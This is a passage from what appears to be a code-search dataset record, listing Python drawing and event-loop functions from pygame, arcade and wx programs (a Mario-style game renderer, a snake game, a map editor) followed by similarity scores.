tool.isKindOfClass_( NSClassFromString(\"GlyphsToolHand\") )\n\t\t\tif not textToolIsActive and not handToolIsActive: \n\t\t\t\treturn True\n\t\treturn False", "def save_drawing_if_necessary(self):\n\n app_doc_data = AppDocData.instance()\n if app_doc_data.activeDrawing and app_doc_data.activeDrawing.modified:\n #if QMessageBox.Yes == QMessageBox.question(self, self.tr(\"Question\"),\n # self.tr(\"Do you want to save drawing?\"),\n # QMessageBox.Yes | QMessageBox.No):\n # self.actionSaveCliked()\n # return True\n if QMessageBox.Ignore == QMessageBox.question(self, self.tr('Continue?'),\n self.tr('Changes may not have been saved.'),\n QMessageBox.Ignore | QMessageBox.Cancel):\n return False\n return True", "def draw(self, surface):\n checked_color = (0, 196, 0) if self.checked else pg.Color(\"white\")\n surface.fill(pg.Color(\"black\"), self.rect)\n surface.fill(self.color, self.rect.inflate(-2,-2))\n surface.fill(pg.Color(\"white\"), self.rect.inflate(-6,-6))\n surface.fill((205,205,205), self.rect.inflate(-8,-8))\n surface.fill(checked_color, self.select_rect)", "def draw(self, surface):\r\n if self.visible:\r\n surface.blit(self.image, (self.x, self.y))", "def OnPaint(self, event):\r\n\r\n dc = wx.AutoBufferedPaintDC(self)\r\n if self._currentImage.IsOk() and self._valid:\r\n dc.DrawBitmap(self._currentImage, 0, 0, True)\r\n else:\r\n self.Draw(dc)", "def on_draw(self):\n arcade.start_render()\n background()\n self.player_sprite.draw()", "def drawScene(background, backX, mario, marioPic, marioFrame, rectList, breakingBrick, brickPic, coins, moveCoins, coinsPic, mushrooms, itemsPic, enemiesList, enemiesPic, bullets, spriteCount, points, isMuted):\n X, Y, VX, VY, DIR, STATE = 0, 1, 2, 3, 4, 5\n ONGROUND, JUMPFRAMES, INGROUND, ISCROUCH, ONPLATFORM, ISFALLING, ISANIMATING, INVULFRAMES = 0, 1, 2, 3, 4, 5, 6, 7\n BRICKVY, IDLE, TYPE = 4, 5, 6\n ENMYVX, ENMYVY, ENMYIDLE, ENMYINFLOOR = 4, 5, 6, 7\n GUNSTATE, GUNCOUNT, GUNTYPE = 4, 5, 6\n BULLVX, BULLVY = 4, 5\n screen.fill(BLACK) # Clearing screen\n screen.blit(background, (backX, 0)) # Blitting background\n # Blitting moving coins\n for coin in moveCoins: # Going through each coin and defining rects\n coinRect = coin[0], coin[1], coin[2], coin[3]\n screen.blit(coinsPic[1][int(spriteCount // 0.4 % 4)], coinRect)\n # Blitting mushrooms\n for mushroom in mushrooms: # Going through each mushroom and defining rects\n mushRect = Rect(mushroom[0], mushroom[1], mushroom[2], mushroom[3])\n if mushroom[4] == 0: # Checkiong if the moving up animation is done\n screen.blit(itemsPic[0], mushRect)\n # Blitting enemies\n for list in enemiesList: # For each type of enemy in the enemies list\n for enemy in list: # For each individual enemy within that type\n enmyRect = Rect(enemy[0], enemy[1], enemy[2], enemy[3])\n if list == goombas:\n if enemy[ENMYIDLE] == 2: # Checking if enemy is dying\n screen.blit(enemiesPic[0][2], enmyRect)\n else: # Normal animation\n screen.blit(enemiesPic[0][int(spriteCount//6)], enmyRect)\n elif list == spinys: # Same thing as goombas except with spinys\n spinePic = enemiesPic[2][int(spriteCount// 2.4 % 2)]\n if enemy[ENMYVX] > 0: # Checking which direction the enemy is moving (1 or -1)\n spinePic = transform.flip(spinePic, True, False)\n screen.blit(spinePic, enmyRect)\n # Blitting bricks and guns\n for list in rectList: # For each type of bricks\n for brick in list: # For each individual brick within that type of brick\n brickRect = Rect(brick[0], brick[1], brick[2], brick[3]) # Defining the rect of that brick\n if list == 
interactBricks: # Bliting the correct picture if it is an interactBrick\n screen.blit(brickPic[1][0],brickRect)\n elif list == questionBricks: # Doing the same thing but also checking if the brick has been hit or not\n if brick[IDLE] == 1:\n screen.blit(brickPic[1][1], brickRect)\n else:\n screen.blit(brickPic[0][int(spriteCount//2)],brickRect)\n elif list == gunRects: # Bliting the pictures for the bullet bills\n if brick[GUNTYPE] == 1:\n screen.blit(enemiesPic[1][1], (brickRect.x, brickRect.y))\n elif brick[GUNTYPE] == 2:\n screen.blit(enemiesPic[1][2], (brickRect.x, brickRect.y))\n # Blitting brick debris\n for brick in breakingBrick: # For each break in all breakable bricks making the debris fall out in all 4 directions if broken\n screen.blit(brickPiece[0], (brick[0] - brick[5], brick[1]))\n screen.blit(brickPiece[1], (brick[0] + 21 + brick[5], brick[1]))\n screen.blit(brickPiece[2], (brick[0] - brick[5] / 2, brick[1] + 21))\n screen.blit(brickPiece[3], (brick[0] + 21 + brick[5] / 2, brick[1] + 21))\n # Blitting coins\n for coin in coins: # For each coin in the list of all coins\n coinRect = coin[0], coin[1], coin[2], coin[3] # Defining the coins rect\n screen.blit(coinsPic[0][int(spriteCount // 2)], coinRect) # Bliting the coins sprite\n # Blitting bullet bills\n for bullet in bullets: # going through each bullet and defining the bullets rect\n bullRect = Rect(bullet[0], bullet[1], bullet[2], bullet[3])\n bullPic = enemiesPic[1][0]\n if bullet[BULLVX] > 0:\n bullPic = transform.flip(bullPic, True, False)\n screen.blit(bullPic, bullRect)\n # Blitting flag\n screen.blit(flagPic[0],(flagInfo[0][0],flagInfo[0][1])) # Blitting pole\n screen.blit(flagPic[1],(flagInfo[1][0],flagInfo[1][1])) # Blitting flag\n # Blitting mario\n marioShow = marioPic[marioFrame[0]][int(marioFrame[1])]\n if mario[DIR] == \"Left\":\n marioShow = transform.flip(marioShow, True, False) # Flipping mario's sprite if he's facing left\n if marioStats[INVULFRAMES]%2 == 0 or marioStats[ISANIMATING]: # Checking if mario's sprite should be skipped this frame\n screen.blit(marioShow, (mario[0], mario[1])) # Blitting mario's sprite\n # Blitting floating points\n for point in points:\n pointText = marioFontThin.render(\"%s\" %point[3], False, WHITE) # Rendering the text\n screen.blit(pointText, (point[0], point[1]))\n # Blitting mute icon\n if isMuted:\n screen.blit(mutePic, (735,25))", "def is_line_busy(self) -> bool:", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected = None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n 
self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return False\n self.draw()\n return False", "def draw(self):\n\n # I reset it at 24 because they're 4 images and I want the reduce the animation speed by 6 (6*4=24)\n if self.spriteCount + 1 >= 24:\n self.spriteCount = 0\n if self.isJump:\n self.screen.blit(self.spriteJump[self.spriteCount // 6], (self.x_pos, self.y_pos))\n else:\n self.screen.blit(self.spriteFall[self.spriteCount // 6], (self.x_pos, self.y_pos))\n self.spriteCount += 1", "def should_redraw_board(self):\n return True", "def begin_draw(self):\n pygame.init()\n self.display = pygame.display.set_mode(self.disp_size)\n pygame.display.set_caption('Map Editing')\n font = pygame.font.SysFont(\"arial\", 15)\n strings = [\"Press ESC to Start Drawing Obstacles\",\n \"Click Left to Draw & Right to Erase\",\n \"To finish Drawing,press Escape \",\n \"During search, Escape or Close to Quit\",\n \"you can also draw during the search, but it won't ba saved\"]\n texts = [font.render(s, True, (255, 255, 255)) for s in strings]\n for i, text in enumerate(texts):\n self.display.blit(text, (self.disp_size[0]//20, i*20+self.disp_size[1]//20))\n pygame.display.update()\n main_screen = True\n while main_screen:\n print(\"Waiting for start\")\n event = pygame.event.wait()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_screen = False\n self.display.fill([255, 255, 255])\n grid.draw(self.display)\n pygame.display.update()\n print(\"Now painting\")\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n break\n pos = list((np.array(pygame.mouse.get_pos())/self.block_size).astype(int))\n if pygame.mouse.get_pressed() == (1, 0, 0):\n print(\"Add wall at\", pos)\n grid[pos].type = \"WALL\"\n grid[pos].draw(self.display, self.block_size)\n elif pygame.mouse.get_pressed() == (0, 0, 1):\n print(\"remove wall from\", pos)\n grid[pos].type = \"ROAD\"\n grid[pos].draw(self.display, self.block_size)\n pygame.display.update()", "def draw(self):\n if self.state == 'alive':\n for i in range(len(self.tail)):\n pygame.draw.rect(display, black, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, black, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))\n\n else:\n for i in range(len(self.tail)):\n pygame.draw.rect(display, red, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, red, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))", "def _draw(self):\n\n pygame.draw.circle(self.display, self.colour,\n self.pos.astype(int),\n self.rad)\n pygame.draw.circle(self.display, black,\n self.pos.astype(int),\n self.rad, 2)", "def render(self, pause=0.05, frame=\"bishop\", save_frames=False):\n if self.fig == None:\n self.init_render()\n\n points1, points2 = self.get_points_on_arc(num_points=100)\n\n while self.ax.lines:\n self.ax.lines.pop() # delete previous plots\n self.ax.plot(points1[:,0], points1[:,1], points1[:,2], label=\"Segment 1\", c=\"black\", linewidth=3)\n self.ax.plot(points2[:,0], points2[:,1], points2[:,2], label=\"Segment 2\", c=\"grey\", linewidth=2)\n 
self.ax.plot([self.goal[0]], [self.goal[1]], [self.goal[2]], label=\"Goal\", c=\"lime\", marker=\"*\", markersize=15)\n self.ax.legend() # display legend\n\n if frame == \"bishop\":\n tangent_vec1 = self.tangent_vec_bishop1\n normal_vec1 = self.normal_vec_bishop1\n binormal_vec1 = self.binormal_vec_bishop1\n tangent_vec2 = self.tangent_vec_bishop2\n normal_vec2 = self.normal_vec_bishop2\n binormal_vec2 = self.binormal_vec_bishop2\n elif frame == \"frenet\":\n tangent_vec1 = self.tangent_vec_frenet1\n normal_vec1 = self.normal_vec_frenet1\n binormal_vec1 = self.binormal_vec_frenet1\n tangent_vec2 = self.tangent_vec_frenet2\n normal_vec2 = self.normal_vec_frenet2\n binormal_vec2 = self.binormal_vec_frenet2\n\n # add dynamic coordinate frenet frame of segment 1 tip\n while len(self.ax.artists) > 3:\n self.ax.artists.pop() # delete previous arrows, except base frame\n atangent1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*tangent_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*tangent_vec1[1]],\n [self.tip_vec1[2], self.tip_vec1[2]+self.arrow_len*tangent_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"b\")\n anormal1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*normal_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*normal_vec1[1]],\n [self.tip_vec1[2], self.tip_vec1[2]+self.arrow_len*normal_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"r\")\n abinormal1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*binormal_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*binormal_vec1[1]],\n [self.tip_vec1[2], self.tip_vec1[2]+self.arrow_len*binormal_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"g\")\n self.ax.add_artist(atangent1)\n self.ax.add_artist(anormal1)\n self.ax.add_artist(abinormal1)\n # add dynamic coordinate frenet frame of segment 2 tip\n atangent2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*tangent_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*tangent_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*tangent_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"b\")\n anormal2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*normal_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*normal_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*normal_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"r\")\n abinormal2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*binormal_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*binormal_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*binormal_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"g\")\n self.ax.add_artist(atangent2)\n self.ax.add_artist(anormal2)\n self.ax.add_artist(abinormal2)\n# goal_vec = (self.goal-self.tip_vec2)/np.linalg.norm(self.goal-self.tip_vec2)\n# agoal = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*goal_vec[0]],\n# [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*goal_vec[1]],\n# [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*goal_vec[2]],\n# arrowstyle=\"fancy\", lw=0.5, mutation_scale=15, color=\"magenta\")\n# self.ax.add_artist(agoal)\n mypause(pause) # pause video without losing focus of current window\n # save frames of plot if asked\n if save_frames == True:\n filename = \"figures/frame\"+str(self.frame)[1:]+\".png\"\n self.fig.savefig(filename)\n self.frame += 1", "def do_animations(self):\n 
self.animate_bloop(700, 160, 50)", "def _draw(self):\r\n \r\n if self.active:\r\n self.surface = self.activeSurface # Set active surface to be displayed.\r\n else:\r\n self.surface = self.passiveSurface # Set passive surface to be displayed.\r", "def run(self):\n while not self.done:\n dt = self.clock.tick(self.fps)\n self.event_loop()\n self.update(dt)\n self.draw()\n pygame.display.flip()\n # pygame.display.update() # can be used to update only part of the screen", "def draw(self, surface, force=False):\n if self.redraw or force:\n surface.blit(self.image, self.loc)\n self.redraw = False", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def redraw(self):\n raise NotImplementedError()", "def draw(self):\r\n try:\r\n self.sprite.draw()\r\n except:\r\n return -1", "def draw(self):\n pg.display.set_caption(\"{:.2f}\".format(self.clock.get_fps()))\n\n \n\n if distance(self.player.pos, self.monster.pos)<MONSTER_BUBBLE_DISTANCE:\n now=pg.time.get_ticks()\n if self.fuzz:\n wait=NOISE_DURATION\n else:\n wait=NOISE_TIMESTEP #change to a function of distance to monster\n if now - self.last_update_noise>wait:\n self.last_update_noise=now\n if self.fuzz:\n self.map_img2=self.map_img\n else:\n self.map_img2=self.noisy_map_img\n #make static sound\n self.fuzz=not self.fuzz\n else:\n self.map_img2=self.map_img\n self.fuzz=False\n\n self.screen.blit(self.map_img2, self.camera.apply_rect(self.map_rect))\n\n # Layer player and monsters on map\n for sprite in self.moving_sprites:\n self.screen.blit(sprite.image, self.camera.apply(sprite))\n if self.draw_debug:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(sprite.hit_rect), 1)\n \n if self.draw_debug:\n for wall in self.walls:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(wall.rect), 1)\n for mirror in self.teleports:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(mirror.rect), 1)\n for goal in self.win:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(goal.rect), 1)\n dest=(self.monster.next_step[0]*TILESIZE, self.monster.next_step[1]*TILESIZE)\n next_step=pg.Rect(0, 0, 20, 20)\n next_step.center=dest\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(next_step), 1)\n \n for sprite in self.static_sprites:\n self.screen.blit(sprite.image, sprite.rect)\n pg.display.flip() #update the full display surface to the screen", "def _step(self) -> bool:\n\n total_run_time_begin = time.time()\n\n try:\n self.compiled_code_run_time += CC3DPy.call_step(self._current_step)\n except CompuCellSetup.CC3DCPlusPlusError as cc3d_cpp_err:\n self._error_message = cc3d_cpp_err.message\n return False\n\n CC3DPy.store_sim_step_data(self._current_step)\n if not self._check_cc3d():\n self.status = SimStatus.SIM_FAILED\n return False\n\n try:\n CC3DPy.call_steer(self._current_step) # Need an interface to write XML-based data in Python\n self._check_cc3d() # Test if this is necessary\n except CompuCellSetup.CC3DCPlusPlusError as cc3d_cpp_err:\n self._error_message = cc3d_cpp_err.message\n self.status = SimStatus.SIM_FAILED\n return False\n\n for frame_c in self._graphics_frames:\n if self._current_step % frame_c.plot_freq == 0:\n frame_c.frame.draw(blocking=frame_c.blocking)\n\n total_run_time_end = time.time()\n self.total_run_time += (total_run_time_end - total_run_time_begin) * 1000\n\n return True", "def 
__call__(self,duration=np.inf):\n\n clock = core.Clock()\n t=0\n while t<duration: #Keep going for the duration\n t=clock.getTime()\n\n self.text.draw()\n self.win.flip()\n\n for key in event.getKeys():\n if key:\n return" ]
[ "0.78179634", "0.68488324", "0.6405945", "0.6315539", "0.6288791", "0.6209565", "0.6140665", "0.6124815", "0.6104606", "0.60049677", "0.5990784", "0.59893525", "0.5976392", "0.5976392", "0.5976392", "0.5976392", "0.59686214", "0.5960046", "0.5932858", "0.5920046", "0.59116364", "0.58809614", "0.58726156", "0.5864331", "0.58313143", "0.5804074", "0.57993144", "0.5795677", "0.5792726", "0.57680404", "0.57530415", "0.57518524", "0.57496196", "0.57459897", "0.57459897", "0.57459897", "0.57411", "0.5729694", "0.57209957", "0.571198", "0.57046", "0.5691893", "0.5689124", "0.56883013", "0.56832886", "0.5679455", "0.5678897", "0.56740826", "0.56676096", "0.56612766", "0.56609094", "0.5633936", "0.56336266", "0.5631699", "0.56188375", "0.55971926", "0.5595678", "0.558884", "0.5588339", "0.55827945", "0.5581188", "0.5560601", "0.5555434", "0.5555183", "0.55541885", "0.55535454", "0.5550223", "0.55468017", "0.5540985", "0.5531774", "0.55272686", "0.55241776", "0.5516332", "0.551618", "0.5509836", "0.5508807", "0.5498404", "0.5495033", "0.5488104", "0.5485799", "0.54825723", "0.5481711", "0.5481583", "0.5481094", "0.5477826", "0.5477204", "0.5477031", "0.5475843", "0.54628295", "0.5461274", "0.5458751", "0.54514664", "0.5450611", "0.5448084", "0.5445917", "0.54455215", "0.5440772", "0.5431003", "0.54299474", "0.5417894" ]
0.8034474
0
Implement your state changing logic here, for example, when a mode is changed
def refresh(self, new_content): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _on_mode_change(self, event):\n mode = event.mode\n if mode == Mode.PAN_ZOOM:\n self.panzoom_button.setChecked(True)\n elif mode == Mode.PICKER:\n self.pick_button.setChecked(True)\n elif mode == Mode.PAINT:\n self.paint_button.setChecked(True)\n elif mode == Mode.FILL:\n self.fill_button.setChecked(True)\n else:\n raise ValueError(\"Mode not recognized\")", "def set_state( self ):", "def _state_cb(self, msg):\n if self.current_mode == '':\n self.current_mode = msg.mode\n self.state = msg", "def _on_mode_change(self, event_name: str, data: dict, kwargs: dict) -> None:\n mode = data[\"name\"]\n\n if data[\"state\"] == \"on\":\n self.mode_events.append(mode)\n elif mode in self.mode_events:\n self.mode_events.remove(mode)\n\n try:\n primary = max(\n (m for m in self.mode_alterations if m[\"mode\"] in self.mode_events),\n key=lambda m: m[\"priority\"],\n )\n except ValueError:\n try:\n primary = next((m for m in self.mode_alterations if m[\"mode\"] == mode))\n except StopIteration:\n return\n\n if primary[\"action\"] == \"enable\":\n primary[\"action\"] = \"disable\"\n else:\n primary[\"action\"] = \"enable\"\n\n # If the primary mode alteration prescribes an action that matches the state the\n # app is already in, return:\n if (self.enabled and primary[\"action\"] == \"enable\") or (\n not self.enabled and primary[\"action\"] == \"disable\"\n ):\n return\n\n if primary[\"action\"] == \"enable\":\n self.enable()\n else:\n self.disable()", "def __stateFrameBas(self, mode):\n self.__btnReset.config(state = mode)\n self.__champBind.config(state = mode)\n self.__listConflit.config(state = mode)", "def set_mode(self,mode,state=True):\n\t\tprint \"SET_MODE START\"\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tif val.index(mode) is not None:\n\t\t\t\tif state:\n\t\t\t\t\tval.activate( val.index(mode) )\n\t\t\t\telse:\n\t\t\t\t\tval.deactivate( val.index(mode) )\n\t\t\"\"\"\n\t\tprint \"SET_MODE DONE -- ALSO DOING EXPERIMENTAL -- \"\n\t\t# DEBUG / EXPERIMENTAL\n\t\tif self.int_encoder is not None:\n\t\t\tif mode == 'volume' and state == True and 'mode_timeout' in self.cfg_gpio and self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. GPIO/VOLUME ({0}:{1}).. disabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.remove_event_detect(13)\n\t\t\t\tself.gpio.remove_event_detect(6)\n\t\t\t\tself.int_enabled = False\n\t\t\telif mode != 'volume' and state == True and 'mode_timeout' in self.cfg_gpio and not self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. GPIO/NOT VOLUME ({0}:{1}).. enabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.setup((13,6), self.gpio.IN, pull_up_down=self.gpio.PUD_DOWN)\n\t\t\t\tself.gpio.add_event_detect(13, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime \n\t\t\t\tself.gpio.add_event_detect(6, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime\n\t\t\t\tself.int_enabled = True\n\t\t\telif mode == 'volume' and state == True and 'mode_timeout' not in self.cfg_gpio and not self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. ECA/VOLUME ({0}:{1}).. enabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.setup((13,6), self.gpio.IN, pull_up_down=self.gpio.PUD_DOWN)\n\t\t\t\tself.gpio.add_event_detect(13, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime \n\t\t\t\tself.gpio.add_event_detect(6, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime\n\t\t\t\tself.int_enabled = True\n\t\t\telif mode != 'volume' and state == True and 'mode_timeout' not in self.cfg_gpio and self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. 
ECA/NOT VOLUME ({0}:{1}).. disabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.remove_event_detect(13)\n\t\t\t\tself.gpio.remove_event_detect(6)\n\t\t\t\tself.int_enabled = False\n\t\t\tprint \"DEBUG2.. done\"\n\t\t\"\"\"", "def state_chosen_do(cfg, app, win, events):", "def _mode_changed(hass, entity_id=None, old_state=None, new_state=None):\n PERSIST['mode'] = str(new_state.state)\n PERSIST['last_cmd'] = None\n _eval_state(hass)", "def _combo_mode_changed(self, *a):\r\n \r\n # Get the current mode.\r\n mode = self.api.get_mode()\r\n \r\n # Update the machine if the combo mode doesn't match\r\n if not mode == self.combo_mode.get_text():\r\n self.api.set_mode(self.combo_mode.get_text())\r\n \r\n # Get the mode again, to make sure it still matches.\r\n if self.api.get_mode() == 'List': \r\n self.combo_mode.set_index(1, block_events=True).enable()\r\n self.number_list_index.set_value(self.api.get_list_index(), block_events=True).enable()\r\n self._number_list_index_changed()\r\n self.number_frequency.disable() #Disable the frequency button\r\n self.number_dbm.disable() #Disable the dbm button\r\n else: \r\n #It is in fixed mode and we update the value of the button\r\n self.combo_mode.set_index(0, block_events=True).enable()\r\n self.number_frequency.set_value(self.api.get_frequency()).enable()\r\n self.number_dbm .set_value(self.api.get_power()).enable()\r\n self.number_list_index.disable() #Change the list index. \r", "def handleModeToggle(self):\n self.filesList.changeMode(not self.autoMode)\n if self.autoMode:\n self.modeToggle.setText(\"Auto Mode\")\n self.mainWindow.setWindowTitle(\"CMAT (Manual Mode)\")\n else:\n self.modeToggle.setText(\"Manual Mode\")\n self.mainWindow.setWindowTitle(\"CMAT (Auto Mode)\")\n self.autoMode = not self.autoMode", "def update_state(self):\n if not self.platforms:\n self.state = self.states['Win']\n elif self.player.y > 389:\n self.state = self.states['Lose'] \n else:\n self.state = self.states['Game']", "def tempo_mode_switch(event):\n value = gremlin.actions.Value(event.is_pressed)\n tempo_mode_switch_container(event, value)", "def setMode(self,mode):\n self.mode=mode\n if self.mode==0:\n self.setDrawing()\n elif self.mode==1:\n self.setConstruction()\n elif self.mode==2:\n self.setDisplay()\n self.context.text.append(\"mode: \"+self.messages[self.mode])", "def notify_mode_change(self, mode):\n pass", "def state_processing_do(cfg, app, win, events):", "def change_state(self):\n new_state = 0 if self.state.state == 1 else 1\n answer = UsbHost.send_query(self.state.ser, \"SetState\", str(self.state.device_id), new_state)\n if answer in wrong_answers:\n error_message(\"Не удалось сменить состояние\")\n self.statusbar.showMessage(answer_translate[answer])\n else:\n self.statusbar.clearMessage()\n self.state.state = new_state\n if new_state == 1:\n self.set_auto_active()\n if new_state == 0:\n self.set_hand_active()", "def state_choose_do(cfg, app, win, events):", "def state_changed(self, oldstate, newstate, event, *args, **kwargs):", "def state_changed(self, oldstate, newstate, event, *args, **kwargs):", "def set_state(self, state: int):", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n 
self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def _on_toggle_and_run(self, kwargs: dict) -> None:\n self.toggle(state=kwargs[CONF_STATE])\n\n if kwargs[CONF_STATE] == \"on\":\n state = \"off\"\n else:\n state = \"on\"\n\n self.handles[HANDLE_VACATION_MODE] = self.run_in(\n self._on_toggle_and_run, randint(5 * 60, 60 * 60), state=state\n )", "def __cb_mode_change(self, list_of_modes):\t\n\t\t\n\t\tnew_active_modes = []\t\t# only the new active mode(s)\n\t\tmode_change_params = []\n\t\tfor mode in list_of_modes:\n\t\t\tmode_change_params.append(mode['mode'])\n\t\t\tmode_change_params.append(mode['state'])\n\t\t\tif mode['state']:\n\t\t\t\tnew_active_modes.append(mode['mode'])\n\n\t\tself.__printer(\"Mode change. {0}\".format(mode_change_params),level=LL_DEBUG)\n\t\tself.__exec_function_by_code('MODE-CHANGE',*mode_change_params)\n\t\t\n\t\tif callable(self.callback_mode_change):\n\t\t\tself.callback_mode_change(mode_change_params)\n\t\t\n\t\t# Check if we have an event for this..\n\t\tif self.event_mode_change:\n\t\t\n\t\t\tfor emc in self.event_mode_change:\n\t\t\t\tif any(x in new_active_modes for x in emc['modes']):\n\t\t\t\t\t\n\t\t\t\t\t# TODO! check if ['type'] == 'mode_change'\n\t\t\t\t\t\n\t\t\t\t\tfor active_mode in new_active_modes:\n\t\t\t\t\t\tif active_mode in emc['modes']:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\trgb_dev = self.get_device_config(emc['device'])\n\t\t\t\t\t\t\tpin_r = rgb_dev['r']\n\t\t\t\t\t\t\tpin_g = rgb_dev['g']\n\t\t\t\t\t\t\tpin_b = rgb_dev['b']\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# ignore pattern for now..\n\t\t\t\t\t\t\t#turn on rgb_1, using ff0000\n\t\t\t\t\t\t\tself.gpio.pwm_rgb(pin_r,pin_g,pin_b,emc['rgb'])", "def update_state(self, context):\n pass", "def _update_state(self) -> None:\n raise NotImplementedError(\"\")", "def mode_changed_callback(self, entity, attribute, old, new, kwargs):\n\n entity_dict = kwargs['entity_dict']\n self.log('{} mode changed to {}.'.format(entity_dict['friendly'], new))\n\n if new == 'Maximum':\n self.turn_on(entity_dict['light'],\n brightness_pct=entity_dict['max_brightness'])\n self.log('Setting {} to {}% brightness.'.format(\n entity_dict['friendly'], entity_dict['max_brightness']))\n elif new == 'Minimum':\n self.turn_on(entity_dict['light'],\n brightness_pct=entity_dict['min_brightness'])\n self.log('Setting {} to {}% brightness.'.format(\n entity_dict['friendly'], entity_dict['min_brightness']))\n elif new == 'Automatic':\n self.set_value(entity_dict['setpoint'], value=0)\n self.auto_brightness_callback(\n dict(entity_dict=entity_dict))", "def check_manual_mode_change(self, 